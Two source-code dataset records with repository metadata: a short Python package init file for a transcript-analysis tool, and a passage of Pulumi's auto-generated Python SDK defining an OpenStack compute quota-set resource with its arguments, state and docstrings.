sprint/tools_fa/__init__.py
|
jumphone/sprint
|
94a5e5450d73b357497fba11eef818c6cc8792aa
|
[
"MIT"
] | 30
|
2018-03-19T05:30:05.000Z
|
2022-01-21T06:54:45.000Z
|
sprint/tools_fa/__init__.py
|
jumphone/sprint
|
94a5e5450d73b357497fba11eef818c6cc8792aa
|
[
"MIT"
] | 13
|
2018-06-30T10:07:02.000Z
|
2021-06-10T13:25:43.000Z
|
from maskAwithG import *
from maskTwithC import *
from transcript_assembler import *
from transcript_locator import *
from transcript_sort import *
| 24.666667
| 34
| 0.831081
| 18
| 148
| 6.666667
| 0.444444
| 0.333333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 148
| 5
| 35
| 29.6
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4025fb0f7a6e66b339f48e7130243a1c13b28517
| 43,803
|
py
|
Python
|
sdk/python/pulumi_openstack/compute/quota_set_v2.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/compute/quota_set_v2.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/compute/quota_set_v2.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['QuotaSetV2Args', 'QuotaSetV2']
@pulumi.input_type
class QuotaSetV2Args:
def __init__(__self__, *,
project_id: pulumi.Input[str],
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a QuotaSetV2 resource.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_group_members: Quota value for server groups members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
pulumi.set(__self__, "project_id", project_id)
if cores is not None:
pulumi.set(__self__, "cores", cores)
if fixed_ips is not None:
pulumi.set(__self__, "fixed_ips", fixed_ips)
if floating_ips is not None:
pulumi.set(__self__, "floating_ips", floating_ips)
if injected_file_content_bytes is not None:
pulumi.set(__self__, "injected_file_content_bytes", injected_file_content_bytes)
if injected_file_path_bytes is not None:
pulumi.set(__self__, "injected_file_path_bytes", injected_file_path_bytes)
if injected_files is not None:
pulumi.set(__self__, "injected_files", injected_files)
if instances is not None:
pulumi.set(__self__, "instances", instances)
if key_pairs is not None:
pulumi.set(__self__, "key_pairs", key_pairs)
if metadata_items is not None:
pulumi.set(__self__, "metadata_items", metadata_items)
if ram is not None:
pulumi.set(__self__, "ram", ram)
if region is not None:
pulumi.set(__self__, "region", region)
if security_group_rules is not None:
pulumi.set(__self__, "security_group_rules", security_group_rules)
if security_groups is not None:
pulumi.set(__self__, "security_groups", security_groups)
if server_group_members is not None:
pulumi.set(__self__, "server_group_members", server_group_members)
if server_groups is not None:
pulumi.set(__self__, "server_groups", server_groups)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
ID of the project to manage quotas.
Changing this creates a new quotaset.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def cores(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for cores.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "cores")
@cores.setter
def cores(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cores", value)
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for fixed IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "fixed_ips")
@fixed_ips.setter
def fixed_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fixed_ips", value)
@property
@pulumi.getter(name="floatingIps")
def floating_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for floating IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "floating_ips")
@floating_ips.setter
def floating_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "floating_ips", value)
@property
@pulumi.getter(name="injectedFileContentBytes")
def injected_file_content_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_content_bytes")
@injected_file_content_bytes.setter
def injected_file_content_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_content_bytes", value)
@property
@pulumi.getter(name="injectedFilePathBytes")
def injected_file_path_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_path_bytes")
@injected_file_path_bytes.setter
def injected_file_path_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_path_bytes", value)
@property
@pulumi.getter(name="injectedFiles")
def injected_files(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for injected files.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_files")
@injected_files.setter
def injected_files(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_files", value)
@property
@pulumi.getter
def instances(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for instances.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "instances")
@instances.setter
def instances(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instances", value)
@property
@pulumi.getter(name="keyPairs")
def key_pairs(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for key pairs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "key_pairs")
@key_pairs.setter
def key_pairs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_pairs", value)
@property
@pulumi.getter(name="metadataItems")
def metadata_items(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for metadata items.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "metadata_items")
@metadata_items.setter
def metadata_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "metadata_items", value)
@property
@pulumi.getter
def ram(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for RAM.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "ram")
@ram.setter
def ram(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ram", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="securityGroupRules")
def security_group_rules(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security group rules.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_group_rules")
@security_group_rules.setter
def security_group_rules(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_group_rules", value)
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_groups", value)
@property
@pulumi.getter(name="serverGroupMembers")
def server_group_members(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for server groups members.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_group_members")
@server_group_members.setter
def server_group_members(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_group_members", value)
@property
@pulumi.getter(name="serverGroups")
def server_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for server groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_groups")
@server_groups.setter
def server_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_groups", value)
@pulumi.input_type
class _QuotaSetV2State:
def __init__(__self__, *,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering QuotaSetV2 resources.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_group_members: Quota value for server groups members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
if cores is not None:
pulumi.set(__self__, "cores", cores)
if fixed_ips is not None:
pulumi.set(__self__, "fixed_ips", fixed_ips)
if floating_ips is not None:
pulumi.set(__self__, "floating_ips", floating_ips)
if injected_file_content_bytes is not None:
pulumi.set(__self__, "injected_file_content_bytes", injected_file_content_bytes)
if injected_file_path_bytes is not None:
pulumi.set(__self__, "injected_file_path_bytes", injected_file_path_bytes)
if injected_files is not None:
pulumi.set(__self__, "injected_files", injected_files)
if instances is not None:
pulumi.set(__self__, "instances", instances)
if key_pairs is not None:
pulumi.set(__self__, "key_pairs", key_pairs)
if metadata_items is not None:
pulumi.set(__self__, "metadata_items", metadata_items)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if ram is not None:
pulumi.set(__self__, "ram", ram)
if region is not None:
pulumi.set(__self__, "region", region)
if security_group_rules is not None:
pulumi.set(__self__, "security_group_rules", security_group_rules)
if security_groups is not None:
pulumi.set(__self__, "security_groups", security_groups)
if server_group_members is not None:
pulumi.set(__self__, "server_group_members", server_group_members)
if server_groups is not None:
pulumi.set(__self__, "server_groups", server_groups)
@property
@pulumi.getter
def cores(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for cores.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "cores")
@cores.setter
def cores(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cores", value)
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for fixed IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "fixed_ips")
@fixed_ips.setter
def fixed_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fixed_ips", value)
@property
@pulumi.getter(name="floatingIps")
def floating_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for floating IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "floating_ips")
@floating_ips.setter
def floating_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "floating_ips", value)
@property
@pulumi.getter(name="injectedFileContentBytes")
def injected_file_content_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_content_bytes")
@injected_file_content_bytes.setter
def injected_file_content_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_content_bytes", value)
@property
@pulumi.getter(name="injectedFilePathBytes")
def injected_file_path_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_path_bytes")
@injected_file_path_bytes.setter
def injected_file_path_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_path_bytes", value)
@property
@pulumi.getter(name="injectedFiles")
def injected_files(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for injected files.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_files")
@injected_files.setter
def injected_files(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_files", value)
@property
@pulumi.getter
def instances(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for instances.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "instances")
@instances.setter
def instances(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instances", value)
@property
@pulumi.getter(name="keyPairs")
def key_pairs(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for key pairs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "key_pairs")
@key_pairs.setter
def key_pairs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_pairs", value)
@property
@pulumi.getter(name="metadataItems")
def metadata_items(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for metadata items.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "metadata_items")
@metadata_items.setter
def metadata_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "metadata_items", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the project to manage quotas.
Changing this creates a new quotaset.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def ram(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for RAM.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "ram")
@ram.setter
def ram(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ram", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="securityGroupRules")
def security_group_rules(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security group rules.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_group_rules")
@security_group_rules.setter
def security_group_rules(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_group_rules", value)
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_groups", value)
@property
@pulumi.getter(name="serverGroupMembers")
def server_group_members(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for server groups members.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_group_members")
@server_group_members.setter
def server_group_members(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_group_members", value)
@property
@pulumi.getter(name="serverGroups")
def server_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for server groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_groups")
@server_groups.setter
def server_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_groups", value)
class QuotaSetV2(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Manages a V2 compute quotaset resource within OpenStack.
> **Note:** This usually requires admin privileges.
> **Note:** This resource has a no-op deletion so no actual actions will be done against the OpenStack API
in case of delete call.
> **Note:** This resource has all-in creation so all optional quota arguments that were not specified are
created with zero value.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
project1 = openstack.identity.Project("project1")
quotaset1 = openstack.compute.QuotaSetV2("quotaset1",
project_id=project1.id,
key_pairs=10,
ram=40960,
cores=32,
instances=20,
server_groups=4,
server_group_members=8)
```
## Import
Quotasets can be imported using the `project_id/region_name`, e.g.
```sh
$ pulumi import openstack:compute/quotaSetV2:QuotaSetV2 quotaset_1 2a0f2240-c5e6-41de-896d-e80d97428d6b/region_1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_group_members: Quota value for server groups members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: QuotaSetV2Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a V2 compute quotaset resource within OpenStack.
> **Note:** This usually requires admin privileges.
> **Note:** This resource has a no-op deletion so no actual actions will be done against the OpenStack API
in case of delete call.
> **Note:** This resource has all-in creation so all optional quota arguments that were not specified are
created with zero value.
## Example Usage
```python
import pulumi
import pulumi_openstack as openstack
project1 = openstack.identity.Project("project1")
quotaset1 = openstack.compute.QuotaSetV2("quotaset1",
project_id=project1.id,
key_pairs=10,
ram=40960,
cores=32,
instances=20,
server_groups=4,
server_group_members=8)
```
## Import
Quotasets can be imported using the `project_id/region_name`, e.g.
```sh
$ pulumi import openstack:compute/quotaSetV2:QuotaSetV2 quotaset_1 2a0f2240-c5e6-41de-896d-e80d97428d6b/region_1
```
:param str resource_name: The name of the resource.
:param QuotaSetV2Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(QuotaSetV2Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = QuotaSetV2Args.__new__(QuotaSetV2Args)
__props__.__dict__["cores"] = cores
__props__.__dict__["fixed_ips"] = fixed_ips
__props__.__dict__["floating_ips"] = floating_ips
__props__.__dict__["injected_file_content_bytes"] = injected_file_content_bytes
__props__.__dict__["injected_file_path_bytes"] = injected_file_path_bytes
__props__.__dict__["injected_files"] = injected_files
__props__.__dict__["instances"] = instances
__props__.__dict__["key_pairs"] = key_pairs
__props__.__dict__["metadata_items"] = metadata_items
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["ram"] = ram
__props__.__dict__["region"] = region
__props__.__dict__["security_group_rules"] = security_group_rules
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["server_group_members"] = server_group_members
__props__.__dict__["server_groups"] = server_groups
super(QuotaSetV2, __self__).__init__(
'openstack:compute/quotaSetV2:QuotaSetV2',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None) -> 'QuotaSetV2':
"""
Get an existing QuotaSetV2 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
:param pulumi.Input[str] region: The region in which to create the volume. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_group_members: Quota value for server groups members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _QuotaSetV2State.__new__(_QuotaSetV2State)
__props__.__dict__["cores"] = cores
__props__.__dict__["fixed_ips"] = fixed_ips
__props__.__dict__["floating_ips"] = floating_ips
__props__.__dict__["injected_file_content_bytes"] = injected_file_content_bytes
__props__.__dict__["injected_file_path_bytes"] = injected_file_path_bytes
__props__.__dict__["injected_files"] = injected_files
__props__.__dict__["instances"] = instances
__props__.__dict__["key_pairs"] = key_pairs
__props__.__dict__["metadata_items"] = metadata_items
__props__.__dict__["project_id"] = project_id
__props__.__dict__["ram"] = ram
__props__.__dict__["region"] = region
__props__.__dict__["security_group_rules"] = security_group_rules
__props__.__dict__["security_groups"] = security_groups
__props__.__dict__["server_group_members"] = server_group_members
__props__.__dict__["server_groups"] = server_groups
return QuotaSetV2(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def cores(self) -> pulumi.Output[int]:
"""
Quota value for cores.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "cores")
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> pulumi.Output[int]:
"""
Quota value for fixed IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "fixed_ips")
@property
@pulumi.getter(name="floatingIps")
def floating_ips(self) -> pulumi.Output[int]:
"""
Quota value for floating IPs.
